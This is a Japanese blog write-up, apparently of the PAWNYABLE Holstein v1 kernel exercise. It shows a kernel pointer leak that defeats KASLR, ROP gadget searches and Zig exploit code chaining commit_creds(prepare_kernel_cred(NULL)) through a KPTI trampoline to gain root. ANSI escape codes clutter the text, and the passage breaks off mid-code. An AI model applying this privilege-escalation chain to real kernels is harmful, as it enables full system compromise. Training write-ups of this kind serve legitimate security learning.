2025-07-30
Tags: pwn
Table of Contents
- v1: Stack Overflow
- v2: Heap Overflow
- v3: Use after Free
- v4: Race Condition
- userfaultfd
- FUSE
- CVE-2021-3490
ptr-yudaiさんのPAWNYABLE [1]を解いてみた。
以下の解法は複雑で、しかも説明は詳しくないかもしれないから、参考以外を利用するには多分難しいだろう。
PAWNYABLEは実にいい資料だから、pwnを学びたいなら、このページを閉じて、そちらに練習してください。
僕の日本語は下手くそ[^fn:1]だが、それでも書く練習したいと思っている。
それと、pwnにZigを使うことは非常に便利ですが(ま、Cよりも)、ですが資料が存在しないらしい。
== �[1m�[4mHolstein�[22m�[24m
=== �[1m�[4mv1: Stack Overflow�[22m�[24m
さて、どの緩和策は有効をチェックしよう。
�[1m�[37mpwn checksec vuln.ko 2>�[0m�[1m�[37m&�[0m�[1m�[36m1�[0m�[1m�[37m�[0m
�[1m�[37m[*] './src/vuln.ko'�[0m
�[1m�[37m Arch: amd64-64-little�[0m
�[1m�[37m RELRO: No RELRO�[0m
�[1m�[37m Stack: No canary found�[0m
�[1m�[37m NX: NX enabled�[0m
�[1m�[37m PIE: No PIE (0x0)�[0m
�[1m�[37m Stripped: No�[0m
�[1m�[37mcat /proc/cpuinfo �[0m�[1m�[37m|�[0m�[1m�[37m grep -q -e �[0m�[33m'smep.*smap'�[0m�[1m�[37m �[0m�[1m�[36m&&�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'SMEP/SMAP enabled'�[0m�[1m�[37m�[0m
�[1m�[37mcat /sys/devices/system/cpu/vulnerabilities/meltdown �[0m�[1m�[37m|�[0m�[1m�[37m grep -q -e �[0m�[33m'PTI'�[0m�[1m�[37m �[0m�[1m�[36m&&�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'KPTI enabled'�[0m�[1m�[37m�[0m
�[1m�[37mcat /proc/cmdline �[0m�[1m�[37m|�[0m�[1m�[37m grep -q -e �[0m�[33m'nokaslr'�[0m�[1m�[37m �[0m�[1m�[36m||�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'KASLR enabled'�[0m�[1m�[37m�[0m
�[1m�[37mSMEP/SMAP enabled�[0m
�[1m�[37mKPTI enabled�[0m
�[1m�[37mKASLR enabled�[0m
FGKASLRもチェックしよう:
�[1m�[37mcat /proc/kallsyms �[0m�[1m�[37m|�[0m�[1m�[37m grep -e �[0m�[33m'startup_64'�[0m�[1m�[37m -e �[0m�[33m'swapgs_restore_regs_and_return_to_usermode'�[0m�[1m�[37m -e �[0m�[33m'prepare_kernel_cred'�[0m�[1m�[37m -e �[0m�[33m'commit_creds'�[0m�[1m�[37m�[0m
�[1m�[37mffffffff99200000 T startup_64�[0m
�[1m�[37mffffffff99200040 T secondary_startup_64�[0m
�[1m�[37mffffffff99200045 T secondary_startup_64_no_verify�[0m
�[1m�[37mffffffff99200230 T __startup_64�[0m
�[1m�[37mffffffff992005e0 T startup_64_setup_env�[0m
�[1m�[37mffffffff9926e240 T prepare_kernel_cred�[0m
�[1m�[37mffffffff9926e390 T commit_creds�[0m
�[1m�[37mffffffff99a00e10 T swapgs_restore_regs_and_return_to_usermode�[0m
�[33m# reboot and run again�[0m�[1m�[37m�[0m
�[1m�[37mcat /proc/kallsyms �[0m�[1m�[37m|�[0m�[1m�[37m grep -e �[0m�[33m'startup_64'�[0m�[1m�[37m -e �[0m�[33m'swapgs_restore_regs_and_return_to_usermode'�[0m�[1m�[37m -e �[0m�[33m'prepare_kernel_cred'�[0m�[1m�[37m -e �[0m�[33m'commit_creds'�[0m�[1m�[37m�[0m
�[1m�[37mffffffffb7600000 T startup_64�[0m
�[1m�[37mffffffffb7600040 T secondary_startup_64�[0m
�[1m�[37mffffffffb7600045 T secondary_startup_64_no_verify�[0m
�[1m�[37mffffffffb7600230 T __startup_64�[0m
�[1m�[37mffffffffb76005e0 T startup_64_setup_env�[0m
�[1m�[37mffffffffb766e240 T prepare_kernel_cred�[0m
�[1m�[37mffffffffb766e390 T commit_creds�[0m
�[1m�[37mffffffffb7e00e10 T swapgs_restore_regs_and_return_to_usermode�[0m
まず、KASLRを回避するてめに、アドレスリークが必要だ。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"std"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x400�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mbytes_read�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mdumpHex�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mbytes_read�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mffffffffa0a00000 T startup_64�[0m
�[1m�[37mffffffffa0a00000 T _stext�[0m
�[1m�[37mffffffffa0a00000 T _text�[0m
�[1m�[37mffffffffa0a00040 T secondary_startup_64�[0m
�[1m�[37mffffffffa0a00045 T secondary_startup_64_no_verify�[0m
�[1m�[37mffffffffa0a00110 t verify_cpu�[0m
�[1m�[37mffffffffa0a00210 T sev_verify_cbit�[0m
�[1m�[37mffffffffa0a00220 T start_cpu0�[0m
�[1m�[37mffffffffa0a00230 T __startup_64�[0m
�[1m�[37mffffffffa0a005e0 T startup_64_setup_env�[0m
�[1m�[37m00007ffdcedd8528 06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 ........@.......�[0m
�[1m�[37m00007ffdcedd8538 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 @.......@.......�[0m
�[1m�[37m00007ffdcedd8548 68 02 00 00 00 00 00 00 68 02 00 00 00 00 00 00 h.......h.......�[0m
�[1m�[37m00007ffdcedd8558 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8568 A8 02 00 00 00 00 00 00 A8 02 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8578 A8 02 00 00 00 00 00 00 16 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8588 16 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8598 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd85a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd85b8 50 AA 00 00 00 00 00 00 50 AA 00 00 00 00 00 00 P.......P.......�[0m
�[1m�[37m00007ffdcedd85c8 00 10 00 00 00 00 00 00 01 00 00 00 05 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd85d8 00 B0 00 00 00 00 00 00 00 B0 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd85e8 00 B0 00 00 00 00 00 00 A4 FF 07 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd85f8 A4 FF 07 00 00 00 00 00 00 10 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8608 01 00 00 00 04 00 00 00 00 B0 08 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8618 00 B0 08 00 00 00 00 00 00 B0 08 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8628 DC 68 02 00 00 00 00 00 DC 68 02 00 00 00 00 00 .h.......h......�[0m
�[1m�[37m00007ffdcedd8638 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8648 20 22 0B 00 00 00 00 00 20 32 0B 00 00 00 00 00 "...... 2......�[0m
�[1m�[37m00007ffdcedd8658 20 32 0B 00 00 00 00 00 03 2E 00 00 00 00 00 00 2..............�[0m
�[1m�[37m00007ffdcedd8668 70 35 00 00 00 00 00 00 00 10 00 00 00 00 00 00 p5..............�[0m
�[1m�[37m00007ffdcedd8678 02 00 00 00 06 00 00 00 90 43 0B 00 00 00 00 00 .........C......�[0m
�[1m�[37m00007ffdcedd8688 90 53 0B 00 00 00 00 00 90 53 0B 00 00 00 00 00 .S.......S......�[0m
�[1m�[37m00007ffdcedd8698 90 01 00 00 00 00 00 00 90 01 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd86a8 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd86b8 C0 02 00 00 00 00 00 00 C0 02 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd86c8 C0 02 00 00 00 00 00 00 30 00 00 00 00 00 00 00 ........0.......�[0m
�[1m�[37m00007ffdcedd86d8 30 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 0...............�[0m
�[1m�[37m00007ffdcedd86e8 53 E5 74 64 04 00 00 00 C0 02 00 00 00 00 00 00 S.td............�[0m
�[1m�[37m00007ffdcedd86f8 C0 02 00 00 00 00 00 00 C0 02 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8708 30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 0.......0.......�[0m
�[1m�[37m00007ffdcedd8718 08 00 00 00 00 00 00 00 51 E5 74 64 06 00 00 00 ........Q.td....�[0m
�[1m�[37m00007ffdcedd8728 00 2C 3B 03 8C 9B FF FF 00 00 00 00 00 00 00 00 .,;.............�[0m
�[1m�[37m00007ffdcedd8738 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8748 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8758 52 E5 74 64 04 00 00 00 20 22 0B 00 00 00 00 00 R.td.... "......�[0m
�[1m�[37m00007ffdcedd8768 20 32 0B 00 00 00 00 00 20 32 0B 00 00 00 00 00 2...... 2......�[0m
�[1m�[37m00007ffdcedd8778 E0 2D 00 00 00 00 00 00 E0 2D 00 00 00 00 00 00 .-.......-......�[0m
�[1m�[37m00007ffdcedd8788 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8798 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd87f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8808 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8818 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8828 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8838 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8848 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8858 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8868 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8878 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8888 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8898 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd88f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8908 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8918 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................�[0m
�[1m�[37m00007ffdcedd8928 E8 7E 54 80 04 B2 FF FF 3C D3 B3 A0 FF FF FF FF .~T.....<.......�[0m
�[1m�[37m00007ffdcedd8938 87 CD B4 A0 01 00 00 00 00 8A 6B 02 8C 9B FF FF ..........k.....�[0m
�[40m�[35m`buf[0x408..][0..8]`�[39m�[49mはカーネルのポインタが似てそう。
何回を動かすでも、このアドレスはカーネルのベースアドレスからのオフセットは固定(差は�[40m`0x13d33c`�[49m)。
狙いはroot権限昇格なので、ROPchainで�[40m�[35m`commit_creds(prepare_kernel_cre
d(NULL))`�[39m�[49mを呼びしよう。
�[1m�[37mropr --nosys --nojop -R �[0m�[33m'^(pop rdi;|pop rcx;|mov rsi, rax;.*|add rdi, rsi;.*) ret;'�[0m�[1m�[37m vmlinux�[0m
�[1m�[37m0xffffffff81049576: add rdi, rsi; add r8, rdi; mov rax, r8; ret;�[0m
�[1m�[37m0xffffffff810a714a: mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;�[0m
�[1m�[37m0xffffffff81c9480d: pop rcx; ret;�[0m
�[1m�[37m0xffffffff81cc6e66: pop rdi; ret;�[0m
�[1m�[37m0xffffffff81f1f0e9: pop rdi; ret;�[0m
�[1m�[37m0xffffffff81f496b1: add rdi, rsi; mov [rdi], rdx; mov [rdi+8], rcx; mov [rdi+0x10], r8d; ret;�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RDI�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff811f61fd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RCX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8146ee3c�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81049576�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff810a714a�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81800e10�[0m�[1m�[36m+�[0m�[1m�[36m22�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPREPARE_KERNEL_CRED�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8106e240�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mCOMMIT_CREDS�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8106e390�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfile�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[1m�[37mFile�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mhandle�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[37m}).�[0m�[37mwriter�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mio�[0m�[1m�[37m.�[0m�[37mbufferedWriter�[0m�[1m�[37m(�[0m�[1m�[37mfile�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m.�[0m�[37mwriter�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteByteNTimes�[0m�[1m�[37m(�[0m�[33m'A'�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x400�[0m�[1m�[36m+�[0m�[1m�[36m8�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPREPARE_KERNEL_CRED�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RCX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// make sub rsi, rcx a nop�[0m
�[1m�[37m �[0m�[1m�[37mMOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mCOMMIT_CREDS�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mret2win�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_cs�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rflags�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rsp�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_ss�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m.�[0m�[37mflush�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RCX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPREPARE_KERNEL_CRED�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mCOMMIT_CREDS�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[36m-�[0m�[1m�[37mropchain�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mret2win�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mnoreturn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"You won!!"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[36mnull�[0m�[1m�[37m]�[0m�[1m�[36m?�[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[33m"/usr/bin/whoami"�[0m�[1m�[37m};�[0m�[1m�[37m�[0m
